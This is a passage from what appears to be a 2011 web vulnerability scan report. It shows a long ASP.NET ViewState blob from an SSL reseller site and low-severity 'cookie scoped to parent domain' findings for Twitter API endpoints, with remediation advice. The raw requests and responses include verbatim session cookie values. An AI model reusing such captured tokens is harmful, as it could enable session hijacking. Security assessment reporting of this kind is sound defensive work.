iYmxvY2stY29udGVudCI+PGltZyBzcmM9Ii9pbWFnZXMvcGF5cGFsLmpwZyIgYWx0PSJQYXlQYWwgU1NMIiAvPjwvZGl2Pg0KPC9kaXY+ZAIJD2QWAmYPZBYCZg9kFgICAQ8WAh8ABfMGPGRpdiBjbGFzcz0iZm9vdGVyX3RvcCI+DQo8ZGl2IGNsYXNzPSJicm93c2VycyI+PGltZyBzcmM9Ii9pbWFnZXMvYnJvd3NlcnMuanBnIiBhbHQ9IiIgLz48L2Rpdj4NCjxkaXYgY2xhc3M9InB1cmNoYXNlIj48aW1nIHNyYz0iL2ltYWdlcy9wdXJjaGFzZS13b3Jrcy5qcGciIGFsdD0iQnV5IENoZWFwIFNTTCBDZXJ0aWZpY2F0ZXMiIC8+PC9kaXY+DQo8dWw+DQo8aDI+V2h5IFNTTE1hdHJpeC5jb20/PC9oMj4NCjxsaT4zMCBEYXkgMTAwJSBtb25leSBiYWNrIGd1YXJhbnRlZTwvbGk+DQo8bGk+RWFzeSBhbmQgc2VjdXJlIFNTTCBvcmRlciBwcm9jZXNzPC9saT4NCjxsaT5JbnN0YW50IFNTTCBpc3N1YW5jZSAtIDI0LzcvMzY1PC9saT4NCjxsaT5MaWZlIHNwYW4gZnJlZSBTU0wgcmVpc3N1ZSBpbnN1cmFuY2U8L2xpPg0KPGxpPldvcmxkIHdpZGUgYXV0aG9yaXplZCBTU0wgcmVzZWxsZXI8L2xpPg0KPGxpPkZyZWUgU1NMIHNpdGUgc2VhbCBvbiBTU0wgcHVyY2hhc2U8L2xpPg0KPC91bD4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0iZm9vdGVyX2JvdHRvbSI+DQo8ZGl2IGNsYXNzPSJmb290ZXJfYm90dG9tX2xlZnQiPjxhIGhyZWY9Ii8iPkhvbWU8L2E+IHwgPGEgaHJlZj0iL3NzbC1icmFuZHMiPlNTTCBCcmFuZHM8L2E+IHwgPGEgaHJlZj0iL3NzbGNlcnRpZmljYXRlcyI+U1NMIENlcnRpZmljYXRlczwvYT4gfCA8YSBocmVmPSIvc3NsLXByb21vdGlvbi1jb2RlIj5TU0wgUHJvbW90aW9uPC9hPiB8IDxhIGhyZWY9Ii9TU0xUb29scyI+U1NMIFRvb2xzPC9hPiB8IDxhIGhyZWY9Ii9jb250YWN0dXMiPkNvbnRhY3QgVXM8L2E+IHwgPGEgaHJlZj0iL1NTTFRvb2xzL3doYXQtaXMtc3NsLWNlcnRpZmljYXRlIj5TU0wgRkFRczwvYT48L2Rpdj4NCjwvZGl2PmRk" />
...[SNIP]...

9.3. https://www.sslmatrix.com/ssl-promotion-code/ssl-price  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sslmatrix.com
Path:   /ssl-promotion-code/ssl-price

Request

GET /ssl-promotion-code/ssl-price HTTP/1.1
Host: www.sslmatrix.com
Connection: keep-alive
Referer: https://www.sslmatrix.com/ssl-promotion-code
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=sbarsdjyp5j2be55zav4bkbo

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:26:06 GMT
Content-Length: 41273


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUINTExODkxNDUPZBYCZg9kFgJmD2QWBAIBD2QWAmYPZBYEZg8WAh4EVGV4dAXdATxtZXRhIG5hbWU9IktleXdvcmRzIiBjb250ZW50PSJTU0wgUHJpY2UsU1NMIENlcnRpZmljYXRlIFByaWNlLFNTTCBDZXJ0aWZpY2F0ZSBDb3N0LENvbXBhcmUgU1NMIENvc3QsIHNzbCBwcmljZXMsIHNzbCBjZXJ0aWZpY2F0ZSBwcmljaW5nLCBzc2wgY2VydGlmaWNhdGUgcHJpY2UsIFByaWNlIE1hdGNoLCBsb3cgY29zdCBzc2wgY2VydGlmaWNhdGUsIGNvbXBhcmUgU1NMIFByaWNlIi8+ZAIBDxYCHwAFoAI8bWV0YSBuYW1lPSJEZXNjcmlwdGlvbiIgY29udGVudD0iU1NMIENlcnRpZmljYXRlIFByaWNlOiBGaW5kIExvdyBDb3N0IFNTTCBDZXJ0aWZpY2F0ZXMsQ2hlYXAgU1NMIFByaWNlcyxTU0wgQ2VydGlmaWNhdGUgQ29zdCBmcm9tIFNTTCBNYXRyaXguIENvbXBhcmUgU1NMIENlcnRpZmljYXRlIFByaWNlIHRvIHB1cmNoYXNlIFNTTCBDZXJ0aWZpY2F0ZXMuIENvbXBhcmUgU1NMIENlcnRpZmljYXRlIENvc3QgdG8gc2VjdXJlIEUtQ29tbWVyY2UgdHJhbnNhY3Rpb24gZnJvbSBUcnVzdGVkIFNTTCBDQS4iLz5kAgMPFgIeBmFjdGlvbgUdL3NzbC1wcm9tb3Rpb24tY29kZS9zc2wtcHJpY2UWAgIBD2QWCgIBD2QWAmYPZBYCZg9kFgICAQ8WAh8ABfgPPHAgY2xhc3M9ImxvZ29fcGFkZGluZyI+PGEgaHJlZj0iLyI+PGltZyBzcmM9Ii9pbWFnZXMvbG9nby5wbmciIGJvcmRlcj0iMCIgYWx0PSJDaGVhcCBTU0wiIC8+PC9hPjwvcD4NCjxkaXYgY2xhc3M9InRvcF90ZXh0Ij5HbG9iYWwgU3VwcGxpZXIgT2YgVHJ1c3RlZCBTU0wgQ2VydGlmaWNhdGVzICZhbXA7IFNpdGUgU2VhbC48L2Rpdj4NCjwhLS0gQkVHSU4gTGl2ZVBlcnNvbiBNb25pdG9yLiAtLT4NCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4vLyA8IVtDREFUQVsNCiAgICAgICAgdmFyIGxwTVRhZ0NvbmZpZyA9IHsgJ2xwU2VydmVyJzogInNlcnZlci5pYWQubGl2ZXBlcnNvbi5uZXQiLCAnbHBOdW1iZXInOiAiNTc5Mzc4MDMiLCAnbHBQcm90b2NvbCc6ICJodHRwcyIgfTsNCiAgICAgICAgZnVuY3Rpb24gbHBBZGRNb25pdG9yVGFnKHNyYykgew0KICAgICAgICAgICAgaWYgKHR5cGVvZiAoc3JjKSA9PSAndW5kZWZpbmVkJyB8fCB0eXBlb2YgKHNyYykgPT0gJ29iamVjdCcpIHsNCiAgICAgICAgICAgICAgICBzcmMgPSBscE1UYWdDb25maWcubHBNVGFnU3JjID8gbHBNVGFnQ29uZmlnLmxwTVRhZ1NyYyA6ICcvaGNwL2h0bWwvbVRhZy5qcyc7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBpZiAoc3JjLmluZGV4T2YoJ2h0dHAnKSAhPSAwKSB7DQogICAgICAgICAgICAgICAgc3JjID0gbHBNVGFnQ29uZmlnLmxwUHJvdG9jb2wgKyAiOi8vIiArIGxwTVRhZ0NvbmZpZy5scFNlcnZlciArIHNyYyArICc/c2l0ZT0nICsgbHBNVGFnQ29uZmlnLmxwTnVtYmVyOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgZWxzZSB7DQogICAgICAgICAgICAgICAgaWYgKHNyYy5pbmRleE9mKCdzaXRlPScpIDwgMCkgew0KICAgICAgICAgICAgICAgICAgICBpZiAoc3JjLmluZGV4T2YoJz8nKSA8IDApIHNyYyA9IHNyYyArICc/JzsgZWxzZSBzcmMgPSBzcmMgKyAnJic7IHNyYyA9IHNyYyArICdzaXRlPScgKyBscE1UYWdDb25maWcubHBOdW1iZXI7DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgfTsgdmFyIHMgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgcy5zZXRBdHRyaWJ1dGUoJ3R5cGUnLCAndGV4dC9qYXZhc2NyaXB0Jyk7IHMuc2V0QXR0cmlidXRlKCdjaGFyc2V0JywgJ2lzby04ODU5LTEnKTsgcy5zZXRBdHRyaWJ1dGUoJ3NyYycsIHNyYyk7IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdoZWFkJykuaXRlbSgwKS5hcHBlbmRDaGlsZChzKTsNCiAgICAgICAgfSBpZiAod2luZG93LmF0dGFjaEV2ZW50KSB3aW5kb3cuYXR0YWNoRXZlbnQoJ29ubG9hZCcsIGxwQWRkTW9uaXRvclRhZyk7IGVsc2Ugd2luZG93LmFkZEV2ZW50TGlzdGVuZXIoImxvYWQiLCBscEFkZE1vbml0b3JUYWcsIGZhbHNlKTsNCi8vIF1dPjwvc2NyaXB0Pg0KPCEtLSBFTkQgTGl2ZVBlcnNvbiBNb25pdG9yLiAtLT4gPCEtLSBMaXZlIENoYXQgQ29kZSBFbmRzIEhlcmUgIC0tPiA8IS0tIEVORCBMaXZlUGVyc29uIE1vbml0b3IuIC0tPiA8IS0tIEdvb2dsZSBBbmFseXRpY3MgQ29kZSBTdGFydCAtLT4NCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4vLyA8IVtDREFUQVsNCnZhciBnYUpzSG9zdCA9ICgoImh0dHBzOiIgPT0gZG9jdW1lbnQubG9jYXRpb24ucHJvdG9jb2wpID8gImh0dHBzOi8vc3NsLiIgOiAiaHR0cDovL3d3dy4iKTsNCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCIlM0NzY3JpcHQgc3JjPSciICsgZ2FKc0hvc3QgKyAiZ29vZ2xlLWFuYWx5dGljcy5jb20vZ2EuanMnIHR5cGU9J3RleHQvamF2YXNjcmlwdCclM0UlM0Mvc2NyaXB0JTNFIikpOw0KLy8gXV0+PC9zY3JpcHQ+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+Ly8gPCFbQ0RBVEFbDQp0cnkgew0KdmFyIHBhZ2VUcmFja2VyID0gX2dhdC5fZ2V0VHJhY2tlcigiVUEtMTE4NTQxMTAtNCIpOw0KcGFnZVRyYWNrZXIuX3RyYWNrUGFnZXZpZXcoKTsNCn0gY2F0Y2goZXJyKSB7fQ0KLy8gXV0+PC9zY3JpcHQ+DQo8IS0tIEdvb2dsZSBBbmFseXRpY3MgQ29kZSBFbmQgLS0+ZAIFD2QWAgIBD2QWAmYPZBYCZg9kFgJmDxYCHwAFxgo8ZGl2IGNsYXNzPSJibG9jayBzc2wtYnktYnJhbmQiPg0KPGRpdiBjbGFzcz0iYmxvY2stdGl0bGUiPjxzcGFuPlNTTCBieSBCcmFuZDwvc3Bhbj48L2Rpdj4NCjxkaXYgY2xhc3M9ImJsb2NrLWNvbnRlbnQiPg0KPHVsPg0KPGxpPjxhIGhyZWY9Ii9zc2wtYnJhbmRzL3JhcGlkc3NsIj4NCjxoMT5SYXBpZFNTTDwvaDE+DQo8L2E+PC9saT4NCjxsaT48YSBocmVmPSIvc3NsLWJyYW5kcy9nZW90cnVzdC1zc2wiPg0KPGgxPkdlb1RydXN0PC9oMT4NCjwvYT48L2xpPg0KPGxpIGNsYXNzPSJsYXN0Ij48YSBocmVmPSIvc3NsLWJyYW5kcy90aGF3dGUtc3NsIj4NCjxoMT5UaGF3dGU8L2gxPg0KPC9hPjwvbGk+DQo8bGkgY2xhc3M9InRpdGxlIj5TU0wgYnkgUHJpY2U8L2xpPg0KPGxpPjxhIGhyZWY9Ii9zc2wtcHJvbW90aW9uLWNvZGUvc3NsLXByaWNlIzB0bzUwIj4kMCAtICQ1MDwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Ii9zc2wtcHJvbW90aW9uLWNvZGUvc3NsLXByaWNlIzUwdG8xMDAiPiQ1MCAtICQxMDA8L2E+PC9saT4NCjxsaT48YSBocmVmPSIvc3NsLXByb21vdGlvbi1jb2RlL3NzbC1wcmljZSMxMDB0bzIwMCI+JDEwMCAtICQyMDA8L2E+PC9saT4NCjxsaSBjbGFzcz0ibGFzdCI+PGEgaHJlZj0iL3NzbC1wcm9tb3Rpb24tY29kZS9zc2wtcHJpY2UjMjAwIj4kMjAwIC0gTW9yZTwvYT48L2xpPg0KPGxpIGNsYXNzPSJ0aXRsZSI+U1NMIGJ5IFR5cGU8L2xpPg0KPGxpPjxhIGhyZWY9Ii9zc2xjZXJ0aWZpY2F0ZXMvZG9tYWluLXNzbCI+RG9tYWluIFZhbGlkYXRpb24gU1NMPC9hPjwvbGk+DQo8bGk+PGEgaHJlZj0iL3NzbGNlcnRpZmljYXRlcy9idXNpbmVzcy12YWxpZGF0aW9uLXNzbCI+QnVzaW5lc3MgVmFsaWRhdGlvbiBTU0w8L2E+PC9saT4NCjxsaT48YSBocmVmPSIvc3NsY2VydGlmaWNhdGVzL3dpbGRjYXJkLWNlcnRpZmljYXRlcyI+DQo8aDE+V2lsZGNhcmQgU1NMIENlcnRpZmljYXRlPC9oMT4NCjwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Ii9zc2xjZXJ0aWZpY2F0ZXMvZXYtc3NsLWNlcnRpZmljYXRlcyI+DQo8aDE+RVYgU1NMIENlcnRpZmljYXRlPC9oMT4NCjwvYT48L2xpPg0KPGxpIGNsYXNzPSJsYXN0Ij48YSBocmVmPSIvc3NsY2VydGlmaWNhdGVzL2NvZGUtc2lnbmluZy1jZXJ0aWZpY2F0ZSI+DQo8aDE+Q29kZSBTaWduaW5nIENlcnRpZmljYXRlPC9oMT4NCjwvYT48L2xpPg0KPC91bD4NCjwvZGl2Pg0KPC9kaXY+DQo8cCBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyBjbGVhcjogYm90aDsiPg0KPHNjcmlwdCBzcmM9Imh0dHBzOi8vc21hcnRpY29uLmdlb3RydXN0LmNvbS9zaS5qcyIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij48L3NjcmlwdD4NCjwvcD5kAgYPZBYCZg9kFgJmD2QWCmYPFgIfAAV4PHA+PHNwYW4gc3R5bGU9ImZvbnQtc2l6ZTogbWVkaXVtOyI+PHN0cm9uZz5TaG9wIFNTTCBDZXJ0aWZpY2F0ZSBCeSBQcmljZTwvc3Ryb25nPjwvc3Bhbj48L3A+DQo8cD4mbmJzcDs8YnIgLz48YnIgLz48L3A+ZAICDxYCHgtfIUl0ZW1Db3VudAIBFgICAQ9kFgZmDxUCDGNvbG9yICAgbGFzdCkvc3NsLWJyYW5kcy9yYXBpZHNzbC9yYXBpZHNzbC1jZXJ0aWZpY2F0ZWQCAQ8PFgIfAAUUUmFwaWRTU0wgQ2VydGlmaWNhdGVkZAICDxUCBTE5LjAwBjEwMS4wMGQCBA8WAh8CAgIWBAIBD2QWBmYPFQIFY29sb3IpL3NzbC1icmFuZHMvZ2VvdHJ1c3Qtc3NsL3F1aWNrc3NsLXByZW1pdW1kAgEPDxYCHwAFHFF1aWNrU1NMIFByZW1pdW0gQ2VydGlmaWNhdGVkZAICDxUCBTg1LjgwBjE2Ny4wMGQCAg9kFgZmDxUCByAgIGxhc3QdL3NzbC1icmFuZHMvdGhhd3RlLXNzbC9zc2wxMjNkAgEPDxYCHwAFDVRoYXd0ZSBTU0wxMjNkZAICDxUCBTU5LjAwBjM1NC4wMGQCBg8WAh8CAgMWBgIBD2QWBmYPFQIFY29sb3IyL3NzbC1icmFuZHMvcmFwaWRzc2wvcmFwaWRzc2wtd2lsZGNhcmQtY2VydGlmaWNhdGVkAgEPDxYCHwAFHVJhcGlkU1NMIFdpbGRjYXJkIENlcnRpZmljYXRlZGQCAg8VAgYxMzEuMDAGMTQxLjAwZAICD2QWBmYPFQIAKC9zc2wtYnJhbmRzL2dlb3RydXN0LXNzbC90cnVlLWJ1c2luZXNzaWRkAgEPDxYCHwAFG1RydWUgQnVzaW5lc3NJRCBDZXJ0aWZpY2F0ZWRkAgIPFQIGMTI5LjgwBjE0Ny4wMGQCAw9kFgZmDxUCDGNvbG9yICAgbGFzdCQvc3NsLWJyYW5kcy90aGF3dGUtc3NsL3dlYnNlcnZlci1zc2xkAgEPDxYCHwAFFVRoYXd0ZSBTU0wgV2ViIFNlcnZlcmRkAgIPFQIGMTM5LjAwBjQwNC4wMGQCCA8WAh8CAgIWBAIBD2QWBmYPFQIFY29sb3IlL3NzbC1icmFuZHMvZ2VvdHJ1c3Qtc3NsL2NoZWFwLWV2LXNzbGQCAQ8PFgIfAAUjVHJ1ZSBCdXNpbmVzc0lEIHdpdGggRVYgQ2VydGlmaWNhdGVkZAICDxUCBjIyNC41MAU3NC4wMGQCAg9kFgZmDxUCByAgIGxhc3QvL3NzbC1icmFuZHMvdGhhd3RlLXNzbC9jb2RlLXNpZ25pbmctY2VydGlmaWNhdGVkAgEPDxYCHwAFEFRoYXd0ZSBDb2RlIFNpZ25kZAICDxUCBjIwOS41MAYxMzAuMDBkAgcPZBYCAgEPZBYCZg9kFgJmD2QWAmYPZBYCZg8WAh8ABd4EPHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPjxpbWcgc3JjPSIvaW1hZ2VzLzMwZGF5c21vbmV5YmFjay5qcGciIGFsdD0iMzAgRGF5cyBNb25leSBCYWNrIiAvPjwvcD4NCjxwPiZuYnNwOzwvcD4NCjxkaXYgY2xhc3M9ImJsb2NrIHBsYXRpbnVtX3BhcnRuZXIiPg0KPGRpdiBjbGFzcz0iYmxvY2stdGl0bGUiPjxzcGFuPlNTTCBSZXNlbGxlcjwvc3Bhbj48L2Rpdj4NCjxkaXYgY2xhc3M9ImJsb2NrLWNvbnRlbnQiPjxpbWcgc3JjPSIvaW1hZ2VzL3JhcGlkX3NzbC5qcGciIGFsdD0iUmFwaWRTU0wiIC8+PGJyIC8+PGJyIC8+PGltZyBzcmM9Ii9pbWFnZXMvZ2VvdHJ1c3Rfc3NsLmpwZyIgYWx0PSJHZW9UcnVzdCIgLz48YnIgLz48YnIgLz48aW1nIHNyYz0iL2ltYWdlcy90aGF3dGVfc3NsLmpwZyIgYWx0PSJUaGF3dGUiIC8+PC9kaXY+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9ImJsb2NrIHBheXBhbCI+DQo8ZGl2IGNsYXNzPSJibG9jay10aXRsZSI+PHNwYW4+V2UgQWNjZXB0PC9zcGFuPjwvZGl2Pg0KPGRpdiBjbGFzcz0iYmxvY2stY29udGVudCI+PGltZyBzcmM9Ii9pbWFnZXMvcGF5cGFsLmpwZyIgYWx0PSJQYXlQYWwgU1NMIiAvPjwvZGl2Pg0KPC9kaXY+ZAIJD2QWAmYPZBYCZg9kFgICAQ8WAh8ABfMGPGRpdiBjbGFzcz0iZm9vdGVyX3RvcCI+DQo8ZGl2IGNsYXNzPSJicm93c2VycyI+PGltZyBzcmM9Ii9pbWFnZXMvYnJvd3NlcnMuanBnIiBhbHQ9IiIgLz48L2Rpdj4NCjxkaXYgY2xhc3M9InB1cmNoYXNlIj48aW1nIHNyYz0iL2ltYWdlcy9wdXJjaGFzZS13b3Jrcy5qcGciIGFsdD0iQnV5IENoZWFwIFNTTCBDZXJ0aWZpY2F0ZXMiIC8+PC9kaXY+DQo8dWw+DQo8aDI+V2h5IFNTTE1hdHJpeC5jb20/PC9oMj4NCjxsaT4zMCBEYXkgMTAwJSBtb25leSBiYWNrIGd1YXJhbnRlZTwvbGk+DQo8bGk+RWFzeSBhbmQgc2VjdXJlIFNTTCBvcmRlciBwcm9jZXNzPC9saT4NCjxsaT5JbnN0YW50IFNTTCBpc3N1YW5jZSAtIDI0LzcvMzY1PC9saT4NCjxsaT5MaWZlIHNwYW4gZnJlZSBTU0wgcmVpc3N1ZSBpbnN1cmFuY2U8L2xpPg0KPGxpPldvcmxkIHdpZGUgYXV0aG9yaXplZCBTU0wgcmVzZWxsZXI8L2xpPg0KPGxpPkZyZWUgU1NMIHNpdGUgc2VhbCBvbiBTU0wgcHVyY2hhc2U8L2xpPg0KPC91bD4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0iZm9vdGVyX2JvdHRvbSI+DQo8ZGl2IGNsYXNzPSJmb290ZXJfYm90dG9tX2xlZnQiPjxhIGhyZWY9Ii8iPkhvbWU8L2E+IHwgPGEgaHJlZj0iL3NzbC1icmFuZHMiPlNTTCBCcmFuZHM8L2E+IHwgPGEgaHJlZj0iL3NzbGNlcnRpZmljYXRlcyI+U1NMIENlcnRpZmljYXRlczwvYT4gfCA8YSBocmVmPSIvc3NsLXByb21vdGlvbi1jb2RlIj5TU0wgUHJvbW90aW9uPC9hPiB8IDxhIGhyZWY9Ii9TU0xUb29scyI+U1NMIFRvb2xzPC9hPiB8IDxhIGhyZWY9Ii9jb250YWN0dXMiPkNvbnRhY3QgVXM8L2E+IHwgPGEgaHJlZj0iL1NTTFRvb2xzL3doYXQtaXMtc3NsLWNlcnRpZmljYXRlIj5TU0wgRkFRczwvYT48L2Rpdj4NCjwvZGl2PmRk" />
...[SNIP]...

10. Cookie scoped to parent domain  previous  next
There are 77 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://api.twitter.com/1/statuses/media_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/media_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/media_timeline.json?offset=0&count=100&page=0&filter=false&include_entities=true&user_id=21457289 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.1.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:04:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055074-42775-36000
X-RateLimit-Limit: 1000
ETag: "1f9f43b2fa532e89f1e2cf41e94dd8ca"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:04:34 GMT
X-RateLimit-Remaining: 994
X-Runtime: 0.01328
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: cabd62773ef621a8fa964ea84b4f0676e1d53b46
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 6331
Connection: close

[{"id_str":"12649013418","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"e3e4e2","protected":false,"id_str":"21457289","notifications":null,"profile_background_til
...[SNIP]...

10.2. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=FrankGruber&count=9&callback=jsonp1315055747616 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055711-7665-16121
X-RateLimit-Limit: 150
ETag: "49cc5068c90057edef228205e1476288"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:11 GMT
X-RateLimit-Remaining: 42
X-Runtime: 0.04128
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: c8c6573bf9320edb145379ebdb80a35520ad745e
X-RateLimit-Reset: 1315058926
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 19248
Connection: close

jsonp1315055747616([{"id_str":"109817941297610752","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"262626","protected":false,"id_str":"820828","notifications":null
...[SNIP]...

10.3. http://api.twitter.com/1/statuses/user_timeline/MSFTResearch.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline/MSFTResearch.json

